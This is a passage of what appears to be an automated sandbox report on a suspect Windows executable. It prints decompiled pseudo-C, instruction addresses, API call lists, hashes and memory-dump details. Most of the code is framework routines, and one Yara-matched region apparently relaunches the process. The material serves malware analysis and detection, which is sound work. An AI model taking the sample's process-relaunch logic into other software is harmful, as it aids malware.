				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x20000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x40000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00080000;
				if(__eflags != 0) {
					_v12 = 0x1000;
					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x80000);
					__eflags = _t209;
				}
				_t199 = _v8;
				 *(_t199 + 0x18) =  *(_t199 + 0x18) | _t209;
				_t145 =  *(_t199 + 0x18);
				__eflags = (_t145 & 0x00003fc0) - 0x3fc0;
				if((_t145 & 0x00003fc0) == 0x3fc0) {
					 *(_t199 + 0x18) = _t145 | 0x00000010;
					_t209 = _t209 | 0x00000010;
					__eflags = _t209;
				}
				asm("sbb eax, eax");
				_t150 =  ~((_t209 & _a4) - _a4) + 1;
				__eflags = _t150;
				return _t150;
			}




























                  0x00411f96
                  0x00411f9e
                  0x00411fa3
                  0x00411fab
                  0x00411fab
                  0x00411fae
                  0x00000000
                  0x00411fb2
                  0x00411fb8
                  0x00411fb9
                  0x00411fba
                  0x00411fc4
                  0x00411fc6
                  0x00411fd3
                  0x00411fd6
                  0x00411fdb
                  0x00411fe4
                  0x00411fe7
                  0x00411fec
                  0x00411fed
                  0x00411ff0
                  0x00411ff3
                  0x00411ff8
                  0x00411ff9
                  0x00412000
                  0x00412007
                  0x0041200c
                  0x0041200e
                  0x00412010
                  0x00412010
                  0x00412010
                  0x0041200e
                  0x00412011
                  0x00412015
                  0x00412017
                  0x00412021
                  0x00412022
                  0x00412029
                  0x0041202e
                  0x00412030
                  0x00412032
                  0x00412032
                  0x00412032
                  0x00412030
                  0x00412035
                  0x00412039
                  0x0041203e
                  0x0041203f
                  0x00412042
                  0x00412049
                  0x00412050
                  0x00412055
                  0x00412057
                  0x00412059
                  0x00412059
                  0x00412059
                  0x00412057
                  0x0041205c
                  0x00412060
                  0x00412070
                  0x00412073
                  0x00412076
                  0x0041207b
                  0x0041207d
                  0x0041207f
                  0x0041207f
                  0x0041207f
                  0x0041207d
                  0x00412082
                  0x00412085
                  0x00412095
                  0x0041209c
                  0x004120a3
                  0x004120a8
                  0x004120aa
                  0x004120ac
                  0x004120ac
                  0x004120ac
                  0x004120aa
                  0x004120ae
                  0x004120b2
                  0x004120bd
                  0x004120c9
                  0x004120cb
                  0x004120cb
                  0x004120cb
                  0x004120cb
                  0x004120d2
                  0x004120d6
                  0x004120de
                  0x004120ea
                  0x004120ea
                  0x004120ea
                  0x004120ec
                  0x004120f0
                  0x004120fb
                  0x00412107
                  0x00412107
                  0x00412107
                  0x0041210e
                  0x00412111
                  0x00412118
                  0x00412120
                  0x00412120
                  0x00412120
                  0x00412127
                  0x0041212a
                  0x00412131
                  0x0041213d
                  0x0041213d
                  0x0041213d
                  0x00412144
                  0x00412147
                  0x0041214e
                  0x0041215a
                  0x0041215a
                  0x0041215a
                  0x00412161
                  0x00412164
                  0x0041216b
                  0x00412177
                  0x00412177
                  0x00412177
                  0x0041217e
                  0x00412181
                  0x00412188
                  0x0041218f
                  0x00412194
                  0x00412194
                  0x00412194
                  0x0041219b
                  0x0041219e
                  0x004121a5
                  0x004121b1
                  0x004121b1
                  0x004121b1
                  0x004121b8
                  0x004121bb
                  0x004121c2
                  0x004121ca
                  0x004121ca
                  0x004121ca
                  0x004121d1
                  0x004121d4
                  0x004121db
                  0x004121e3
                  0x004121e3
                  0x004121e3
                  0x004121ea
                  0x004121ed
                  0x004121f4
                  0x00412200
                  0x00412200
                  0x00412200
                  0x00412207
                  0x0041220a
                  0x00412211
                  0x0041221d
                  0x0041221d
                  0x0041221d
                  0x00412224
                  0x00412227
                  0x0041222e
                  0x00412236
                  0x00412236
                  0x00412236
                  0x0041223d
                  0x00412240
                  0x00412247
                  0x00412253
                  0x00412253
                  0x00412253
                  0x00412255
                  0x00412258
                  0x0041225b
                  0x00412267
                  0x00412269
                  0x0041226e
                  0x00412271
                  0x00412271
                  0x00412271
                  0x00412280
                  0x00412282
                  0x00412282
                  0x00000000

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: _memset
                  • String ID: @$@$AfxControlBar90s$AfxFrameOrView90s$AfxMDIFrame90s
                  • API String ID: 2102423945-1210016405
                  • Opcode ID: 48f1f3766a55285f2edbc49f154cf69d3c1f460646b03b50caf20c9a1f8d3e0c
                  • Instruction ID: a80ea7a57d0ef6c1a4e0f94e743f0cf838566c70e38dc4dc6695c3c797ddb862
                  • Opcode Fuzzy Hash: 48f1f3766a55285f2edbc49f154cf69d3c1f460646b03b50caf20c9a1f8d3e0c
                  • Instruction Fuzzy Hash: 2091F175D00209BBDB50DFD4C586BDFBFE8AB48344F14817AFA08E6181E7B88A95C794
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406EBD, Relevance: 10.6, APIs: 7, Instructions: 127windowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 609 406ebd-406f11 call 431db1 613 407012-40701f call 430650 609->613 614 406f17-406f4c call 412b38 call 412b6c 609->614 622 406fa5-406fc5 call 412b6c 614->622 623 406f4e-406fa2 SendMessageA * 5 614->623 626 406fca-406fd6 622->626 623->622 627 407005-407007 626->627 628 406fd8-406fda 626->628 631 407009-40700c InvalidateRect 627->631 629 406fe3-406ffb 628->629 630 406fdc-406fe1 628->630 629->613 633 406ffd-407003 629->633 630->627 630->629 631->613 633->631
                  C-Code - Quality: 63%
                  			E00406EBD(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v17;
				char _v18;
				signed int _v19;
				char _v28;
				long _v32;
				signed int _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t43;
				signed int _t50;
				signed char _t57;
				void* _t68;
				void* _t86;
				intOrPtr* _t87;
				intOrPtr* _t88;
				signed int _t89;

				_t86 = __edx;
				_t43 =  *0x463404; // 0x18eab29f
				_v8 = _t43 ^ _t89;
				_t87 = _a8;
				_t88 = __ecx;
				_push( &_v28);
				_push(_a4);
				_push(0x417);
				 *((intOrPtr*)( *__ecx + 0x118))();
				 *(_t87 + 8) =  *(_t87 + 8) ^ 0x00000004;
				_v18 = 0;
				_v17 = 0;
				 *((char*)(_t87 + 0xa)) = 0;
				 *((char*)(_t87 + 0xb)) = 0;
				if(E00431DB1(_t87,  &_v28, 0x14) != 0) {
					_t50 = E00412B38(_t88);
					_t69 = _t50;
					_v36 = _t50;
					E00412B6C(_t88, 0x10000000, 0, 0); // executed
					 *((intOrPtr*)( *_t88 + 0x118))(0x416, _a4, 0, _t68);
					if( *((intOrPtr*)(_t87 + 0x10)) < 0xffffffff) {
						_v32 = SendMessageA( *(_t88 + 0x20), 0x43d, 0, 0);
						SendMessageA( *(_t88 + 0x20), 0xb, 0, 0);
						SendMessageA( *(_t88 + 0x20), 0x43c, _v32 + 1, 0);
						SendMessageA( *(_t88 + 0x20), 0x43c, _v32, 0);
						SendMessageA( *(_t88 + 0x20), 0xb, 1, 0);
						 *((intOrPtr*)(_t87 + 0x10)) =  *((intOrPtr*)(_t87 + 0x10)) + 0xf4240;
						_t69 = _v36;
					}
					 *((intOrPtr*)( *_t88 + 0x118))(_a4, _t87);
					E00412B6C(_t88, 0, _t69 & 0x10000000, 0); // executed
					_t57 =  *((intOrPtr*)(_t87 + 9));
					_t68 = 0x415;
					if(((_t57 ^ _v19) & 0x00000001) != 0 || (_t57 & 0x00000001) != 0 &&  *_t87 != _v28) {
						_push(1);
						_push(0);
						goto L9;
					} else {
						_push( &_v52);
						_push(_a4);
						_push(0x41d);
						if( *((intOrPtr*)( *_t88 + 0x118))() != 0) {
							_push(1);
							_push( &_v52);
							L9:
							_t48 = InvalidateRect( *(_t88 + 0x20), ??, ??);
						}
					}
				}
				return E00430650(_t48, _t68, _v8 ^ _t89, _t86, _t87, _t88);
			}






















                  0x00406ebd
                  0x00406ec5
                  0x00406ecc
                  0x00406ed1
                  0x00406ed4
                  0x00406edb
                  0x00406edc
                  0x00406ee1
                  0x00406ee6
                  0x00406eec
                  0x00406ef7
                  0x00406efb
                  0x00406eff
                  0x00406f03
                  0x00406f11
                  0x00406f1a
                  0x00406f23
                  0x00406f2c
                  0x00406f2f
                  0x00406f42
                  0x00406f4c
                  0x00406f6b
                  0x00406f6e
                  0x00406f7f
                  0x00406f8e
                  0x00406f99
                  0x00406f9b
                  0x00406fa2
                  0x00406fa2
                  0x00406fb2
                  0x00406fc5
                  0x00406fca
                  0x00406fd2
                  0x00406fd6
                  0x00407005
                  0x00407007
                  0x00000000
                  0x00406fe3
                  0x00406fe8
                  0x00406fe9
                  0x00406fee
                  0x00406ffb
                  0x00406ffd
                  0x00407002
                  0x00407009
                  0x0040700c
                  0x0040700c
                  0x00406ffb
                  0x00406fd6
                  0x0040701f

                  APIs
                  • _memcmp.LIBCMT ref: 00406F07
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • SendMessageA.USER32(?,0000043D,00000000,00000000), ref: 00406F60
                  • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00406F6E
                  • SendMessageA.USER32(?,0000043C,?,00000000), ref: 00406F7F
                  • SendMessageA.USER32(?,0000043C,?,00000000), ref: 00406F8E
                  • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00406F99
                  • InvalidateRect.USER32(?,00000000,00000001,00000000,00000000), ref: 0040700C
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSend$InvalidateLongRectWindow_memcmp
                  • String ID:
                  • API String ID: 235743446-0
                  • Opcode ID: b4ca3858cf842c725fa609f0672fd941354109755bb967841d1566607b793c20
                  • Instruction ID: 911494d41f6155cba064028fc0f85afa7879889cb5e7fc441d97dfeff554b02b
                  • Opcode Fuzzy Hash: b4ca3858cf842c725fa609f0672fd941354109755bb967841d1566607b793c20
                  • Instruction Fuzzy Hash: CE417E30740208BBEB219F65CC56FEEBBB4FF08B14F104529F6556A2D1CBB4A950CB98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023ECD97, Relevance: 10.6, APIs: 7, Instructions: 63stringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 023ECDBC
                  • GetCommandLineW.KERNEL32 ref: 023ECDFA
                  • lstrlenW.KERNEL32(00000000), ref: 023ECE03
                  • lstrlenW.KERNEL32(?), ref: 023ECE12
                  • lstrcmpiW.KERNEL32(00000000,?), ref: 023ECE27
                  • ExitProcess.KERNEL32 ref: 023ECE38
                    • Part of subcall function 023E1CC2: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 023E1CF2
                  • ExitProcess.KERNEL32 ref: 023ECE5F
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$Exitlstrlen$CommandCreateFileLineModuleNamelstrcmpi
                  • String ID:
                  • API String ID: 1899540587-0
                  • Opcode ID: eefdf306e8166ca9d2b27cd2953862a3bdde2e27c2eecb82b539c10bbc42ffc2
                  • Instruction ID: 7a99ac36ad741e1238dc680fc244f3947c13f92fe1549d48f999b7ead3bc44a1
                  • Opcode Fuzzy Hash: eefdf306e8166ca9d2b27cd2953862a3bdde2e27c2eecb82b539c10bbc42ffc2
                  • Instruction Fuzzy Hash: 5A11E1B2940028ABDB64B764AC88EFE77BDEB80705F000451F20A93185EF305D5C8EA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00416A7E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46COMMON
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E00416A7E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t18;
				void* _t44;
				void* _t48;

				_t42 = __edx;
				_t31 = __ebx;
				_push(8);
				_t18 = E00431A9B(E0044B456, __ebx, __edi, __esi);
				_t44 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x90)) == 0) {
					_t51 =  *((intOrPtr*)(__ecx + 0x92));
					if( *((intOrPtr*)(__ecx + 0x92)) == 0) {
						E004014C0(_t48 - 0x14, __edx);
						 *((intOrPtr*)(_t48 - 4)) = 0;
						E004292E7(__ebx, __edx,  *((intOrPtr*)(E0041F363(__ebx, _t44, 0, _t51) + 8)), _t48 - 0x14); // executed
						_push(PathFindFileNameA( *(_t48 - 0x14)));
						E00406039(_t31, _t48 - 0x10, _t42, _t44, 0, _t51);
						 *((char*)(_t48 - 4)) = 1;
						PathRemoveExtensionA(E0040A688(_t48 - 0x10));
						E0040A356(_t48 - 0x10, 0xffffffff);
						 *((short*)(_t44 + 0x90)) = GlobalAddAtomA( *(_t48 - 0x10));
						 *((short*)(_t44 + 0x92)) = GlobalAddAtomA("system");
						E004010B0( &(( *(_t48 - 0x10))[0xfffffffffffffff0]), _t42);
						_t18 = E004010B0( &(( *(_t48 - 0x14))[0xfffffffffffffff0]), _t42);
					}
				}
				return E00431B73(_t18);
			}






                  0x00416a7e
                  0x00416a7e
                  0x00416a7e
                  0x00416a85
                  0x00416a8a
                  0x00416a95
                  0x00416a9b
                  0x00416aa2
                  0x00416aab
                  0x00416ab0
                  0x00416ac0
                  0x00416ace
                  0x00416ad2
                  0x00416ada
                  0x00416ae4
                  0x00416aef
                  0x00416b04
                  0x00416b13
                  0x00416b1a
                  0x00416b25
                  0x00416b25
                  0x00416aa2
                  0x00416b2f

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00416A85
                    • Part of subcall function 004292E7: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00429312
                    • Part of subcall function 004292E7: GetShortPathNameA.KERNEL32(?,00000000,00000104), ref: 00429329
                  • PathFindFileNameA.SHLWAPI(?,00000008,004017F8), ref: 00416AC8
                    • Part of subcall function 00406039: __EH_prolog3.LIBCMT ref: 00406040
                  • PathRemoveExtensionA.SHLWAPI(00000000,00000000), ref: 00416AE4
                  • GlobalAddAtomA.KERNEL32 ref: 00416AFD
                  • GlobalAddAtomA.KERNEL32 ref: 00416B0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: NamePath$AtomFileGlobalH_prolog3$ExtensionFindModuleRemoveShort
                  • String ID: system
                  • API String ID: 403193770-3377271179
                  • Opcode ID: 715c8a44715037ab561ca445d125d12101abcb7d420da627e4c206c2fae4e1a1
                  • Instruction ID: 6af8255d80fce4e2872a3a295f9b7920885497d175e20f34bb1b1a59f62aa56d
                  • Opcode Fuzzy Hash: 715c8a44715037ab561ca445d125d12101abcb7d420da627e4c206c2fae4e1a1
                  • Instruction Fuzzy Hash: E1117031800126ABCF05EBB5CC46AAFB774BF00358F50422EB425272E2DB782944C7AE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042FFA2, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E0042FFA2(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t14;
				intOrPtr _t17;
				void* _t18;
				struct HINSTANCE__* _t19;
				void* _t31;
				intOrPtr _t35;
				void* _t36;
				void* _t37;

				_t37 = __eflags;
				_t32 = __edi;
				_t31 = __edx;
				_t25 = __ebx;
				_t11 = SetErrorMode(0); // executed
				SetErrorMode(_t11 | 0x00008001); // executed
				_t14 = E0041F363(__ebx, __edi, SetErrorMode, _t37);
				_t35 = _a4;
				 *((intOrPtr*)(_t14 + 8)) = _t35;
				 *((intOrPtr*)(_t14 + 0xc)) = _t35;
				E0041EB0A(__ebx, _t14, _t31); // executed
				_t17 =  *((intOrPtr*)(E0041F363(_t25, __edi, _t35, _t37) + 4));
				_t38 = _t17;
				if(_t17 != 0) {
					 *((intOrPtr*)(_t17 + 0x48)) = _a12;
					 *((intOrPtr*)(_t17 + 0x4c)) = _a16;
					 *((intOrPtr*)(_t17 + 0x44)) = _t35;
					E0042FE1C(_t17, _t31, _t38); // executed
				}
				_t18 = E0041F363(_t25, _t32, _t35, _t38);
				_t39 =  *((char*)(_t18 + 0x14));
				_pop(_t36);
				if( *((char*)(_t18 + 0x14)) == 0) {
					E004161F7(_t36, _t39);
				}
				_t19 = GetModuleHandleA("user32.dll");
				if(_t19 != 0) {
					 *0x46633c = GetProcAddress(_t19, "NotifyWinEvent");
				}
				return 1;
			}














                  0x0042ffa2
                  0x0042ffa2
                  0x0042ffa2
                  0x0042ffa2
                  0x0042ffb0
                  0x0042ffb8
                  0x0042ffba
                  0x0042ffbf
                  0x0042ffc4
                  0x0042ffc7
                  0x0042ffca
                  0x0042ffd4
                  0x0042ffd7
                  0x0042ffd9
                  0x0042ffde
                  0x0042ffe4
                  0x0042ffe9
                  0x0042ffec
                  0x0042ffec
                  0x0042fff1
                  0x0042fff6
                  0x0042fffa
                  0x0042fffb
                  0x0042fffd
                  0x0042fffd
                  0x00430007
                  0x0043000f
                  0x0043001d
                  0x0043001d
                  0x00430026

                  APIs
                  • SetErrorMode.KERNELBASE(00000000), ref: 0042FFB0
                  • SetErrorMode.KERNELBASE(00000000), ref: 0042FFB8
                    • Part of subcall function 0041EB0A: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EB42
                    • Part of subcall function 0041EB0A: SetLastError.KERNEL32(0000006F), ref: 0041EB59
                  • GetModuleHandleA.KERNEL32(user32.dll), ref: 00430007
                  • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 00430017
                    • Part of subcall function 0042FE1C: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0042FE59
                    • Part of subcall function 0042FE1C: PathFindExtensionA.KERNELBASE(?), ref: 0042FE73
                    • Part of subcall function 0042FE1C: __strdup.LIBCMT ref: 0042FEBB
                    • Part of subcall function 0042FE1C: __strdup.LIBCMT ref: 0042FEFA
                    • Part of subcall function 0042FE1C: __strdup.LIBCMT ref: 0042FF41
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ErrorModule__strdup$FileModeName$AddressExtensionFindHandleLastPathProc
                  • String ID: NotifyWinEvent$user32.dll
                  • API String ID: 621541537-597752486
                  • Opcode ID: c6a86a99ad862286b29c596775c83a7a365c59ac402591dd4d029d8a3d1260bd
                  • Instruction ID: c3559d0f6dcdbc91b9a4477413689282f5a49392fc776aba5323f530c7d64581
                  • Opcode Fuzzy Hash: c6a86a99ad862286b29c596775c83a7a365c59ac402591dd4d029d8a3d1260bd
                  • Instruction Fuzzy Hash: 9C015E74A102149BD714AF66A845A9A3AE8AB08724B05806BF845D7352DA78D8448B69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00417A77, Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                  Download Yara Rule
                  C-Code - Quality: 91%
                  			E00417A77(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t60;
				signed int _t65;
				signed int _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				signed int _t72;
				signed int _t102;
				void* _t113;
				signed int _t116;
				DLGTEMPLATE* _t117;
				struct HWND__* _t118;
				intOrPtr* _t120;
				void* _t121;

				_t115 = __edi;
				_t113 = __edx;
				_t96 = __ecx;
				_push(0x3c);
				E00431ACE(E0044B598, __ebx, __edi, __esi);
				_t120 = __ecx;
				 *((intOrPtr*)(_t121 - 0x20)) = __ecx;
				_t125 =  *(_t121 + 0x10);
				if( *(_t121 + 0x10) == 0) {
					 *(_t121 + 0x10) =  *(E0041F363(0, __edi, __ecx, _t125) + 0xc);
				}
				_t116 =  *(E0041F363(0, _t115, _t120, _t125) + 0x3c);
				 *(_t121 - 0x28) = _t116;
				 *(_t121 - 0x14) = 0;
				 *(_t121 - 4) = 0;
				E00411F96(0, _t96, _t116, _t120, _t125, 0x10);
				E00411F96(0, _t96, _t116, _t120, _t125, 0x3c000);
				if(_t116 == 0) {
					_t117 =  *(_t121 + 8);
					L7:
					__eflags = _t117;
					if(_t117 == 0) {
						L4:
						_t60 = 0;
						L26:
						return E00431B73(_t60);
					}
					E004014C0(_t121 - 0x1c, _t113);
					 *(_t121 - 4) = 1;
					 *((intOrPtr*)(_t121 - 0x18)) = 0;
					_t65 = E0042A0D6(__eflags, _t117, _t121 - 0x1c, _t121 - 0x18);
					__eflags = _t65;
					__eflags = 0 | _t65 == 0x00000000;
					if(__eflags != 0) {
						_push(_t117);
						E0042A09A(0, _t121 - 0x38, _t117);
						 *(_t121 - 4) = 2;
						E00429FF6(_t121 - 0x38,  *((intOrPtr*)(_t121 - 0x18)));
						 *(_t121 - 0x14) = E00429D03(_t121 - 0x38);
						 *(_t121 - 4) = 1;
						E00429CF5(_t121 - 0x38);
						__eflags =  *(_t121 - 0x14);
						if(__eflags != 0) {
							_t117 = GlobalLock( *(_t121 - 0x14));
						}
					}
					 *(_t120 + 0x44) =  *(_t120 + 0x44) | 0xffffffff;
					 *(_t120 + 0x3c) =  *(_t120 + 0x3c) | 0x00000010;
					E00410F0D(__eflags, _t120);
					_t68 =  *(_t121 + 0xc);
					__eflags = _t68;
					if(_t68 != 0) {
						_t69 =  *(_t68 + 0x20);
					} else {
						_t69 = 0;
					}
					_t70 = CreateDialogIndirectParamA( *(_t121 + 0x10), _t117, _t69, E00417499, 0); // executed
					_t118 = _t70;
					E004010B0( *((intOrPtr*)(_t121 - 0x1c)) + 0xfffffff0, _t113);
					 *(_t121 - 4) =  *(_t121 - 4) | 0xffffffff;
					_t102 =  *(_t121 - 0x28);
					__eflags = _t102;
					if(__eflags != 0) {
						__eflags = _t118;
						if(__eflags != 0) {
							 *((intOrPtr*)( *_t102 + 0x18))(_t121 - 0x48);
							 *((intOrPtr*)( *_t120 + 0x134))(0);
						}
					}
					_t72 = E0040EEF5(__eflags);
					__eflags = _t72;
					if(_t72 == 0) {
						 *((intOrPtr*)( *_t120 + 0x11c))();
					}
					__eflags = _t118;
					if(_t118 != 0) {
						__eflags =  *(_t120 + 0x3c) & 0x00000010;
						if(( *(_t120 + 0x3c) & 0x00000010) == 0) {
							DestroyWindow(_t118);
							_t118 = 0;
							__eflags = 0;
						}
					}
					__eflags =  *(_t121 - 0x14);
					if( *(_t121 - 0x14) != 0) {
						GlobalUnlock( *(_t121 - 0x14));
						GlobalFree( *(_t121 - 0x14));
					}
					__eflags = _t118;
					_t54 = _t118 != 0;
					__eflags = _t54;
					_t60 = 0 | _t54;
					goto L26;
				}
				_push(_t121 - 0x48);
				if( *((intOrPtr*)( *_t120 + 0x134))() != 0) {
					_t117 =  *((intOrPtr*)( *_t116 + 0x14))(_t121 - 0x48,  *(_t121 + 8));
					goto L7;
				}
				goto L4;
			}
















                  0x00417a77
                  0x00417a77
                  0x00417a77
                  0x00417a77
                  0x00417a7e
                  0x00417a83
                  0x00417a85
                  0x00417a8a
                  0x00417a8d
                  0x00417a97
                  0x00417a97
                  0x00417a9f
                  0x00417aa4
                  0x00417aa7
                  0x00417aaa
                  0x00417aad
                  0x00417ab7
                  0x00417abe
                  0x00417aeb
                  0x00417aee
                  0x00417aee
                  0x00417af0
                  0x00417ad2
                  0x00417ad2
                  0x00417c25
                  0x00417c2a
                  0x00417c2a
                  0x00417af5
                  0x00417b03
                  0x00417b07
                  0x00417b0a
                  0x00417b14
                  0x00417b1b
                  0x00417b1d
                  0x00417b1f
                  0x00417b23
                  0x00417b2e
                  0x00417b32
                  0x00417b42
                  0x00417b45
                  0x00417b49
                  0x00417b4e
                  0x00417b51
                  0x00417b5c
                  0x00417b5c
                  0x00417b51
                  0x00417b5e
                  0x00417b62
                  0x00417b67
                  0x00417b6c
                  0x00417b6f
                  0x00417b71
                  0x00417b77
                  0x00417b73
                  0x00417b73
                  0x00417b73
                  0x00417b85
                  0x00417b91
                  0x00417b93
                  0x00417b98
                  0x00417bc2
                  0x00417bc5
                  0x00417bc7
                  0x00417bc9
                  0x00417bcb
                  0x00417bd3
                  0x00417bdb
                  0x00417bdb
                  0x00417bcb
                  0x00417be1
                  0x00417be6
                  0x00417be8
                  0x00417bee
                  0x00417bee
                  0x00417bf4
                  0x00417bf6
                  0x00417bf8
                  0x00417bfc
                  0x00417bff
                  0x00417c05
                  0x00417c05
                  0x00417c05
                  0x00417bfc
                  0x00417c07
                  0x00417c0a
                  0x00417c0f
                  0x00417c18
                  0x00417c18
                  0x00417c20
                  0x00417c22
                  0x00417c22
                  0x00417c22
                  0x00000000
                  0x00417c22
                  0x00417ac5
                  0x00417ad0
                  0x00417ae7
                  0x00000000
                  0x00417ae7
                  0x00000000

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 00417A7E
                  • GlobalLock.KERNEL32 ref: 00417B56
                  • CreateDialogIndirectParamA.USER32(?,?,?,Function_00017499,00000000), ref: 00417B85
                  • DestroyWindow.USER32(00000000), ref: 00417BFF
                  • GlobalUnlock.KERNEL32(?), ref: 00417C0F
                  • GlobalFree.KERNEL32 ref: 00417C18
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
                  • String ID:
                  • API String ID: 3003189058-0
                  • Opcode ID: 26ae8e959123f86c784b667f59ab4b8ba21f1b10ffa1528ca1f931d7bb6d0aa9
                  • Instruction ID: 0f3f62645ed42ea5829c959189857bbee3ade0c5a9f02b3c178cd9c28f783011
                  • Opcode Fuzzy Hash: 26ae8e959123f86c784b667f59ab4b8ba21f1b10ffa1528ca1f931d7bb6d0aa9
                  • Instruction Fuzzy Hash: 0C51B331A04209DFCF10EFA5C9859EEBBB1BF08318F14442EF502E7291DB789A81CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00414166, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 209windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 62%
                  			E00414166(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, RECT* _a8) {
				signed int _v8;
				char _v268;
				RECT* _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				char _v292;
				intOrPtr _v296;
				signed int _v300;
				struct tagRECT _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t71;
				signed char _t79;
				signed int _t84;
				signed int _t89;
				signed int _t91;
				signed int _t99;
				signed int _t114;
